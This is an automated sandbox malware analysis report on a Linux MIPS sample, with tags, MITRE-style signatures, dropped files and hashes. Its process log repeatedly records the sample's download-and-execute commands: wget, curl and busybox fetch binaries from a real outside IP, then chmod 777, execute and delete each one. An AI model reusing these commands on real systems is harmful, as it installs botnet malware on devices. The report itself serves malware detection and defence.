Malware Analysis Report

2025-04-03 19:13

Sample ID 241120-eyzbjavrgq
Target f064d9b048e7a9ebfafd42ad6312891eb24fe7887284fafac08ecb4d8547ec6aN
SHA256 f064d9b048e7a9ebfafd42ad6312891eb24fe7887284fafac08ecb4d8547ec6a
Tags
defense_evasion discovery antivm
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

f064d9b048e7a9ebfafd42ad6312891eb24fe7887284fafac08ecb4d8547ec6a

Threat Level: Shows suspicious behavior

The file f064d9b048e7a9ebfafd42ad6312891eb24fe7887284fafac08ecb4d8547ec6aN was found to show suspicious behavior.

Malicious Activity Summary

defense_evasion discovery antivm

File and Directory Permissions Modification

Executes dropped EXE

Checks CPU configuration

Reads runtime system information

Writes file to tmp directory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-20 04:21

Signatures

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-11-20 04:21

Reported

2024-11-20 04:23

Platform

debian9-mipsbe-20240418-en

Max time kernel

120s

Max time network

123s

Command Line

[/tmp/f064d9b048e7a9ebfafd42ad6312891eb24fe7887284fafac08ecb4d8547ec6aN]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu /tmp/rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu N/A
N/A /tmp/qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr /tmp/qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr N/A
N/A /tmp/jMz018FmqirIthXno2QOE7F6cNd83CvXXY /tmp/jMz018FmqirIthXno2QOE7F6cNd83CvXXY N/A
N/A /tmp/iv4c8JysYuHJvbhRma1GzoMM3YnCOG2tXY /tmp/iv4c8JysYuHJvbhRma1GzoMM3YnCOG2tXY N/A
N/A /tmp/cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4 /tmp/cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4 N/A
N/A /tmp/IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4 /tmp/IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4 N/A
N/A /tmp/Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0 /tmp/Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0 N/A
N/A /tmp/Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2 /tmp/Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2 N/A
N/A /tmp/ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p /tmp/ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p N/A
N/A /tmp/FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP /tmp/FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP N/A
N/A /tmp/DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI /tmp/DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI N/A
N/A /tmp/BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2 /tmp/BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2 N/A
N/A /tmp/s45lvV1K474ofmcNwNK414hXZBMOCYnE5B /tmp/s45lvV1K474ofmcNwNK414hXZBMOCYnE5B N/A
N/A /tmp/f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp /tmp/f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp N/A
N/A /tmp/cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4 /tmp/cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4 N/A
N/A /tmp/IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4 /tmp/IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4 N/A
N/A /tmp/Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0 /tmp/Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0 N/A
N/A /tmp/Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2 /tmp/Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2 N/A
N/A /tmp/ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p /tmp/ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p N/A
N/A /tmp/FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP /tmp/FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP N/A
N/A /tmp/DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI /tmp/DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI N/A
N/A /tmp/BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2 /tmp/BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2 N/A
N/A /tmp/s45lvV1K474ofmcNwNK414hXZBMOCYnE5B /tmp/s45lvV1K474ofmcNwNK414hXZBMOCYnE5B N/A
N/A /tmp/f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp /tmp/f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp N/A
N/A /tmp/rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu /tmp/rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu N/A
N/A /tmp/qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr /tmp/qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr N/A
N/A /tmp/jMz018FmqirIthXno2QOE7F6cNd83CvXXY /tmp/jMz018FmqirIthXno2QOE7F6cNd83CvXXY N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/iv4c8JysYuHJvbhRma1GzoMM3YnCOG2tXY /usr/bin/curl N/A
File opened for modification /tmp/DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI /usr/bin/curl N/A
File opened for modification /tmp/IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4 /usr/bin/curl N/A
File opened for modification /tmp/BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2 /usr/bin/curl N/A
File opened for modification /tmp/f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp /usr/bin/curl N/A
File opened for modification /tmp/rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu /usr/bin/curl N/A
File opened for modification /tmp/rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu /usr/bin/curl N/A
File opened for modification /tmp/jMz018FmqirIthXno2QOE7F6cNd83CvXXY /usr/bin/curl N/A
File opened for modification /tmp/DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI /usr/bin/curl N/A
File opened for modification /tmp/FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP /usr/bin/curl N/A
File opened for modification /tmp/f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp /usr/bin/curl N/A
File opened for modification /tmp/Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0 /usr/bin/curl N/A
File opened for modification /tmp/Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2 /usr/bin/curl N/A
File opened for modification /tmp/jMz018FmqirIthXno2QOE7F6cNd83CvXXY /usr/bin/curl N/A
File opened for modification /tmp/qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr /usr/bin/curl N/A
File opened for modification /tmp/Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2 /usr/bin/curl N/A
File opened for modification /tmp/FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP /usr/bin/curl N/A
File opened for modification /tmp/ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p /usr/bin/curl N/A
File opened for modification /tmp/s45lvV1K474ofmcNwNK414hXZBMOCYnE5B /usr/bin/curl N/A
File opened for modification /tmp/s45lvV1K474ofmcNwNK414hXZBMOCYnE5B /usr/bin/curl N/A
File opened for modification /tmp/cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4 /usr/bin/curl N/A
File opened for modification /tmp/cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4 /usr/bin/curl N/A
File opened for modification /tmp/BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2 /usr/bin/curl N/A
File opened for modification /tmp/IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4 /usr/bin/curl N/A
File opened for modification /tmp/Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0 /usr/bin/curl N/A
File opened for modification /tmp/ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p /usr/bin/curl N/A
File opened for modification /tmp/qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr /usr/bin/curl N/A

Processes

/tmp/f064d9b048e7a9ebfafd42ad6312891eb24fe7887284fafac08ecb4d8547ec6aN

[/tmp/f064d9b048e7a9ebfafd42ad6312891eb24fe7887284fafac08ecb4d8547ec6aN]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://216.126.231.240/bins/rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu]

/bin/chmod

[chmod 777 rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu]

/tmp/rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu

[./rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu]

/bin/rm

[rm rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu]

/usr/bin/wget

[wget http://216.126.231.240/bins/qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr]

/bin/chmod

[chmod 777 qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr]

/tmp/qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr

[./qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr]

/bin/rm

[rm qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr]

/usr/bin/wget

[wget http://216.126.231.240/bins/jMz018FmqirIthXno2QOE7F6cNd83CvXXY]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/jMz018FmqirIthXno2QOE7F6cNd83CvXXY]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/jMz018FmqirIthXno2QOE7F6cNd83CvXXY]

/bin/chmod

[chmod 777 jMz018FmqirIthXno2QOE7F6cNd83CvXXY]

/tmp/jMz018FmqirIthXno2QOE7F6cNd83CvXXY

[./jMz018FmqirIthXno2QOE7F6cNd83CvXXY]

/bin/rm

[rm jMz018FmqirIthXno2QOE7F6cNd83CvXXY]

/usr/bin/wget

[wget http://216.126.231.240/bins/iv4c8JysYuHJvbhRma1GzoMM3YnCOG2tXY]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/iv4c8JysYuHJvbhRma1GzoMM3YnCOG2tXY]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/iv4c8JysYuHJvbhRma1GzoMM3YnCOG2tXY]

/bin/chmod

[chmod 777 iv4c8JysYuHJvbhRma1GzoMM3YnCOG2tXY]

/tmp/iv4c8JysYuHJvbhRma1GzoMM3YnCOG2tXY

[./iv4c8JysYuHJvbhRma1GzoMM3YnCOG2tXY]

/bin/rm

[rm iv4c8JysYuHJvbhRma1GzoMM3YnCOG2tXY]

/usr/bin/wget

[wget http://216.126.231.240/bins/cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4]

/bin/chmod

[chmod 777 cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4]

/tmp/cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4

[./cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4]

/bin/rm

[rm cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4]

/usr/bin/wget

[wget http://216.126.231.240/bins/IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4]

/bin/chmod

[chmod 777 IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4]

/tmp/IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4

[./IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4]

/bin/rm

[rm IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4]

/usr/bin/wget

[wget http://216.126.231.240/bins/Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0]

/bin/chmod

[chmod 777 Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0]

/tmp/Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0

[./Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0]

/bin/rm

[rm Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0]

/usr/bin/wget

[wget http://216.126.231.240/bins/Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2]

/bin/chmod

[chmod 777 Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2]

/tmp/Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2

[./Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2]

/bin/rm

[rm Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2]

/usr/bin/wget

[wget http://216.126.231.240/bins/ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p]

/bin/chmod

[chmod 777 ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p]

/tmp/ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p

[./ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p]

/bin/rm

[rm ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p]

/usr/bin/wget

[wget http://216.126.231.240/bins/FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP]

/bin/chmod

[chmod 777 FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP]

/tmp/FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP

[./FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP]

/bin/rm

[rm FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP]

/usr/bin/wget

[wget http://216.126.231.240/bins/DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI]

/bin/chmod

[chmod 777 DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI]

/tmp/DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI

[./DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI]

/bin/rm

[rm DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI]

/usr/bin/wget

[wget http://216.126.231.240/bins/BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2]

/bin/chmod

[chmod 777 BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2]

/tmp/BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2

[./BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2]

/bin/rm

[rm BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2]

/usr/bin/wget

[wget http://216.126.231.240/bins/s45lvV1K474ofmcNwNK414hXZBMOCYnE5B]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/s45lvV1K474ofmcNwNK414hXZBMOCYnE5B]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/s45lvV1K474ofmcNwNK414hXZBMOCYnE5B]

/bin/chmod

[chmod 777 s45lvV1K474ofmcNwNK414hXZBMOCYnE5B]

/tmp/s45lvV1K474ofmcNwNK414hXZBMOCYnE5B

[./s45lvV1K474ofmcNwNK414hXZBMOCYnE5B]

/bin/rm

[rm s45lvV1K474ofmcNwNK414hXZBMOCYnE5B]

/usr/bin/wget

[wget http://216.126.231.240/bins/f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp]

/bin/chmod

[chmod 777 f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp]

/tmp/f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp

[./f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp]

/bin/rm

[rm f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp]

/usr/bin/wget

[wget http://216.126.231.240/bins/cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4]

/bin/chmod

[chmod 777 cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4]

/tmp/cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4

[./cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4]

/bin/rm

[rm cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4]

/usr/bin/wget

[wget http://216.126.231.240/bins/IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4]

/bin/chmod

[chmod 777 IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4]

/tmp/IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4

[./IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4]

/bin/rm

[rm IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4]

/usr/bin/wget

[wget http://216.126.231.240/bins/Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0]

/bin/chmod

[chmod 777 Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0]

/tmp/Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0

[./Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0]

/bin/rm

[rm Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0]

/usr/bin/wget

[wget http://216.126.231.240/bins/Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2]

/bin/chmod

[chmod 777 Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2]

/tmp/Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2

[./Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2]

/bin/rm

[rm Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2]

/usr/bin/wget

[wget http://216.126.231.240/bins/ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p]

/bin/chmod

[chmod 777 ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p]

/tmp/ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p

[./ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p]

/bin/rm

[rm ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p]

/usr/bin/wget

[wget http://216.126.231.240/bins/FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP]

/bin/chmod

[chmod 777 FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP]

/tmp/FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP

[./FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP]

/bin/rm

[rm FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP]

/usr/bin/wget

[wget http://216.126.231.240/bins/DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI]

/bin/chmod

[chmod 777 DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI]

/tmp/DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI

[./DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI]

/bin/rm

[rm DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI]

/usr/bin/wget

[wget http://216.126.231.240/bins/BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2]

/bin/chmod

[chmod 777 BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2]

/tmp/BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2

[./BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2]

/bin/rm

[rm BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2]

/usr/bin/wget

[wget http://216.126.231.240/bins/s45lvV1K474ofmcNwNK414hXZBMOCYnE5B]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/s45lvV1K474ofmcNwNK414hXZBMOCYnE5B]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/s45lvV1K474ofmcNwNK414hXZBMOCYnE5B]

/bin/chmod

[chmod 777 s45lvV1K474ofmcNwNK414hXZBMOCYnE5B]

/tmp/s45lvV1K474ofmcNwNK414hXZBMOCYnE5B

[./s45lvV1K474ofmcNwNK414hXZBMOCYnE5B]

/bin/rm

[rm s45lvV1K474ofmcNwNK414hXZBMOCYnE5B]

/usr/bin/wget

[wget http://216.126.231.240/bins/f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp]

/bin/chmod

[chmod 777 f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp]

/tmp/f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp

[./f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp]

/bin/rm

[rm f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp]

/usr/bin/wget

[wget http://216.126.231.240/bins/rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu]

/bin/chmod

[chmod 777 rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu]

/tmp/rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu

[./rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu]

/bin/rm

[rm rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu]

/usr/bin/wget

[wget http://216.126.231.240/bins/qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr]

/bin/chmod

[chmod 777 qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr]

/tmp/qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr

[./qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr]

/bin/rm

[rm qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr]

/usr/bin/wget

[wget http://216.126.231.240/bins/jMz018FmqirIthXno2QOE7F6cNd83CvXXY]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/jMz018FmqirIthXno2QOE7F6cNd83CvXXY]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/jMz018FmqirIthXno2QOE7F6cNd83CvXXY]

/bin/chmod

[chmod 777 jMz018FmqirIthXno2QOE7F6cNd83CvXXY]

/tmp/jMz018FmqirIthXno2QOE7F6cNd83CvXXY

[./jMz018FmqirIthXno2QOE7F6cNd83CvXXY]

/bin/rm

[rm jMz018FmqirIthXno2QOE7F6cNd83CvXXY]

/usr/bin/wget

[wget http://216.126.231.240/bins/iv4c8JysYuHJvbhRma1GzoMM3YnCOG2tXY]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/iv4c8JysYuHJvbhRma1GzoMM3YnCOG2tXY]

Network

Country Destination Domain Proto
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 tcp

Files

/tmp/rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral4

Detonation Overview

Submitted

2024-11-20 04:21

Reported

2024-11-20 04:23

Platform

debian9-mipsel-20240729-en

Max time kernel

119s

Max time network

